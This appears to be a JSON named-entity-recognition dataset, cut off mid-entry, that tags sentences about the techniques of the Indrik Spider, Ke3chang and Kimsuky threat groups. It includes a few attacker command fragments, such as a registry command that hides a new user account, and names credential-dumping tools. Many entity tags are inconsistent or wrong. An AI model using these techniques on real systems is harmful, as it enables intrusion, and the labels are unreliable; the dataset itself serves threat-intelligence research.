{ + "tokens": [ + "Indrik", + "Spider", + "has", + "attempted", + "to", + "get", + "users", + "to", + "click", + "on", + "a", + "malicious", + "zipped", + "file." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "developed", + "malware", + "for", + "their", + "operations,", + "including", + "ransomware", + "such", + "as", + "BitPaymer", + "and", + "WastedLocker." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "used", + "fake", + "updates", + "for", + "FlashPlayer", + "plugin", + "and", + "Google", + "Chrome", + "as", + "initial", + "infection", + "vectors." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "PowerShell", + "Empire", + "for", + "execution", + "of", + "malware." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "PowerView", + "to", + "enumerate", + "all", + "Windows", + "Server,", + "Windows", + "Server", + "2003,", + "and", + "Windows", + "7", + "instances", + "in", + "the", + "Active", + "Directory", + "database." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "served", + "fake", + "updates", + "via", + "legitimate", + "websites", + "that", + "have", + "been", + "compromised." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "PsExec", + "to", + "stop", + "services", + "prior", + "to", + "the", + "execution", + "of", + "ransomware." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "the", + "win32_service", + "WMI", + "class", + "to", + "retrieve", + "a", + "list", + "of", + "services", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "batch", + "scripts", + "on", + "victim's", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Indrik", + "Spider", + "has", + "used", + "WMIC", + "to", + "execute", + "commands", + "on", + "remote", + "computers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Ke3chang", + "group", + "has", + "been", + "known", + "to", + "compress", + "data", + "before", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "is", + "known", + "to", + "use", + "7Zip", + "and", + "RAR", + "with", + "passwords", + "to", + "encrypt", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "performed", + "frequent", + "and", + "scheduled", + "data", + "collection", + "from", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "performed", + "frequent", + "and", + "scheduled", + "data", + "exfiltration", + "from", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "compromised", + "credentials", + "to", + "sign", + "into", + "victims’", + "Microsoft", + "365", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malware", + "used", + "by", + "Ke3chang", + "can", + "run", + "commands", + "on", + "the", + "command-line", + "interface." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "malware", + "RoyalDNS", + "has", + "used", + "DNS", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "gathered", + "information", + "and", + "files", + "from", + "local", + "directories", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "deobfuscated", + "Base64-encoded", + "shellcode", + "strings", + "prior", + "to", + "loading", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "performs", + "account", + "discovery", + "using", + "commands", + "such", + "as", + "<code>net", + "localgroup", + "administrators</code>", + "and", + "<code>net", + "group", + "\"REDACTED\"", + "/domain</code>", + "on", + "specific", + "permissions", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "performs", + "discovery", + "of", + "permission", + "groups", + "<code>net", + "group", + "/domain</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "transferred", + "compressed", + "and", + "encrypted", + "RAR", + "files", + "containing", + "exfiltration", + "through", + "the", + "established", + "backdoor", + "command", + "and", + "control", + "channel", + "during", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "compromised", + "networks", + "by", + "exploiting", + "Internet-facing", + "applications,", + "including", + "vulnerable", + "Microsoft", + "Exchange", + "and", + "SharePoint", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "gained", + "access", + "through", + "VPNs", + "including", + "with", + "compromised", + "accounts", + "and", + "stolen", + "VPN", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "uses", + "command-line", + "interaction", + "to", + "search", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "Mimikatz", + "to", + "generate", + "Kerberos", + "golden", + "tickets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "tools", + "to", + "download", + "files", + "to", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "keyloggers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "dumped", + "credentials,", + "including", + "by", + "using", + "gsecdump." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "dumped", + "credentials,", + "including", + "by", + "using", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ke3chang", + "performs", + "account", + "discovery", + "using", + "commands", + "such", + "as", + "<code>net", + "localgroup", + "administrators</code>", + "and", + "<code>net", + "group", + "\"REDACTED\"", + "/domain</code>", + "on", + "specific", + "permissions", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "developed", + "custom", + "malware", + "that", + "allowed", + "them", + "to", + "maintain", + "persistence", + "on", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "dropped", + "their", + "malware", + "into", + "legitimate", + "installed", + "software", + "paths", + "including:", + "`C:\\ProgramFiles\\Realtek\\Audio\\HDA\\AERTSr.exe`,", + "`C:\\Program", + "Files", + "(x86)\\Foxit", + "Software\\Foxit", + "Reader\\FoxitRdr64.exe`,", + "`C:\\Program", + "Files", + "(x86)\\Adobe\\Flash", + "Player\\AddIns\\airappinstaller\\airappinstall.exe`,", + "and", + "`C:\\Program", + "Files", + "(x86)\\Adobe\\Acrobat", + "Reader", + "DC\\Reader\\AcroRd64.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "NTDSDump", + "and", + "other", + "password", + "dumping", + "tools", + "to", + "gather", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "Base64-encoded", + "shellcode", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "performs", + "process", + "discovery", + "using", + "<code>tasklist</code>", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "Ke3chang", + "backdoors", + "achieved", + "persistence", + "by", + "adding", + "a", + "Run", + "key." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "compromised", + "credentials", + "and", + "a", + ".NET", + "tool", + "to", + "dump", + "data", + "from", + "Microsoft", + "Exchange", + "mailboxes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "network", + "scanning", + "and", + "enumeration", + "tools,", + "including", + "Ping." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "the", + "right-to-left", + "override", + "character", + "in", + "spearphishing", + "attachment", + "names", + "to", + "trick", + "targets", + "into", + "executing", + ".scr", + "and", + ".exe", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "actors", + "have", + "been", + "known", + "to", + "copy", + "files", + "to", + "the", + "network", + "shares", + "of", + "other", + "computers", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "dumped", + "credentials,", + "including", + "by", + "using", + "gsecdump." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "a", + "tool", + "known", + "as", + "RemoteExec", + "(similar", + "to", + "PsExec)", + "to", + "remotely", + "execute", + "batch", + "scripts", + "and", + "binaries." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "used", + "a", + "SharePoint", + "enumeration", + "and", + "data", + "dumping", + "tool", + "known", + "as", + "spwebmember." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ke3chang", + "performs", + "operating", + "system", + "information", + "discovery", + "using", + "<code>systeminfo</code>", + "and", + "has", + "used", + "implants", + "to", + "identify", + "the", + "system", + "language", + "and", + "computer", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "implants", + "to", + "collect", + "the", + "system", + "language", + "ID", + "of", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "performed", + "local", + "network", + "configuration", + "discovery", + "using", + "<code>ipconfig</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "performs", + "local", + "network", + "connection", + "discovery", + "using", + "<code>netstat</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "implants", + "capable", + "of", + "collecting", + "the", + "signed-in", + "username." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "performs", + "service", + "discovery", + "using", + "<code>net", + "start</code>", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "credential", + "dumpers", + "or", + "stealers", + "to", + "obtain", + "legitimate", + "credentials,", + "which", + "they", + "used", + "to", + "gain", + "access", + "to", + "victim", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "malware", + "including", + "RoyalCli", + "and", + "BS2005", + "have", + "communicated", + "over", + "HTTP", + "with", + "the", + "C2", + "server", + "through", + "Internet", + "Explorer", + "(IE)", + "by", + "using", + "the", + "COM", + "interface", + "IWebBrowser2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "has", + "used", + "batch", + "scripts", + "in", + "its", + "malware", + "to", + "install", + "persistence", + "mechanisms." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ke3chang", + "backdoor", + "RoyalDNS", + "established", + "persistence", + "through", + "adding", + "a", + "service", + "called", + "<code>Nwsapagent</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "added", + "accounts", + "to", + "specific", + "groups", + "with", + "<code>net", + "localgroup</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "modified", + "versions", + "of", + "PHProxy", + "to", + "examine", + "web", + "traffic", + "between", + "the", + "victim", + "and", + "the", + "accessed", + "website." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "RC4", + "encryption", + "before", + "exfil." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "QuickZip", + "to", + "archive", + "stolen", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "Blogspot", + "pages", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "Google", + "Chrome", + "browser", + "extensions", + "to", + "infect", + "victims", + "and", + "to", + "steal", + "passwords", + "and", + "cookies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "a", + "HWP", + "document", + "stealer", + "module", + "which", + "changes", + "the", + "default", + "program", + "association", + "in", + "the", + "registry", + "to", + "open", + "HWP", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "signed", + "files", + "with", + "the", + "name", + "EGIS", + "CO,.", + "Ltd.." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "tools", + "that", + "are", + "capable", + "of", + "obtaining", + "credentials", + "from", + "saved", + "mail." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "browser", + "extensions", + "including", + "Google", + "Chrome", + "to", + "steal", + "passwords", + "and", + "cookies", + "from", + "browsers.", + "Kimsuky", + "has", + "also", + "used", + "Nirsoft's", + "WebBrowserPassView", + "tool", + "to", + "dump", + "the", + "passwords", + "obtained", + "from", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Org", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "collected", + "Office,", + "PDF,", + "and", + "HWP", + "documents", + "from", + "its", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "decoded", + "malicious", + "VBScripts", + "using", + "Base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "created", + "and", + "used", + "a", + "mailing", + "toolkit", + "to", + "use", + "in", + "spearphishing", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "been", + "observed", + "disabling", + "the", + "system", + "firewall." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "been", + "observed", + "turning", + "off", + "Windows", + "Security", + "Center", + "and", + "can", + "hide", + "the", + "AV", + "software", + "window", + "from", + "the", + "view", + "of", + "the", + "infected", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "registered", + "domains", + "to", + "spoof", + "targeted", + "organizations", + "and", + "trusted", + "third", + "parties." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "compromised", + "legitimate", + "sites", + "and", + "used", + "them", + "to", + "distribute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "compromised", + "email", + "accounts", + "to", + "send", + "spearphishing", + "e-mails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "created", + "email", + "accounts", + "for", + "phishing", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "collected", + "valid", + "email", + "addresses", + "that", + "were", + "subsequently", + "used", + "in", + "spearphishing", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "set", + "auto-forward", + "rules", + "on", + "victim's", + "e-mail", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "collected", + "victim", + "employee", + "name", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "exfiltrated", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "exfiltrated", + "stolen", + "files", + "and", + "data", + "to", + "actor-controlled", + "Blogspot", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "exploited", + "various", + "vulnerabilities", + "for", + "initial", + "access,", + "including", + "Microsoft", + "Exchange", + "vulnerability", + "CVE-2020-0688." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "obtained", + "exploit", + "code", + "for", + "various", + "CVEs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "RDP", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "deleted", + "the", + "exfiltrated", + "data", + "on", + "disk", + "after", + "transmission.", + "Kimsuky", + "has", + "also", + "used", + "an", + "instrumentor", + "script", + "to", + "terminate", + "browser", + "processes", + "running", + "on", + "an", + "infected", + "system", + "and", + "then", + "delete", + "the", + "cookie", + "files", + "on", + "disk." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "FTP", + "to", + "download", + "additional", + "malware", + "to", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "the", + "ability", + "to", + "enumerate", + "all", + "files", + "and", + "directories", + "on", + "an", + "infected", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "collected", + "victim", + "organization", + "information", + "including", + "but", + "not", + "limited", + "to", + "organization", + "hierarchy,", + "functions,", + "press", + "releases,", + "and", + "others." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "run", + "<code>reg", + "add", + "‘HKLM\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList’", + "/v</code>", + "to", + "hide", + "a", + "newly", + "created", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "an", + "information", + "gathering", + "module", + "that", + "will", + "hide", + "an", + "AV", + "software", + "window", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "downloaded", + "additional", + "scripts,", + "tools,", + "and", + "malware", + "onto", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "sent", + "internal", + "spearphishing", + "emails", + "for", + "lateral", + "movement", + "after", + "stealing", + "victim", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "JScript", + "for", + "logging", + "and", + "downloading", + "additional", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "a", + "PowerShell-based", + "keylogger", + "as", + "well", + "as", + "a", + "tool", + "called", + "MECHANICAL", + "to", + "log", + "keystrokes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "gathered", + "credentials", + "using", + "Mimikatz", + "and", + "ProcDump." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "created", + "accounts", + "with", + "<code>net", + 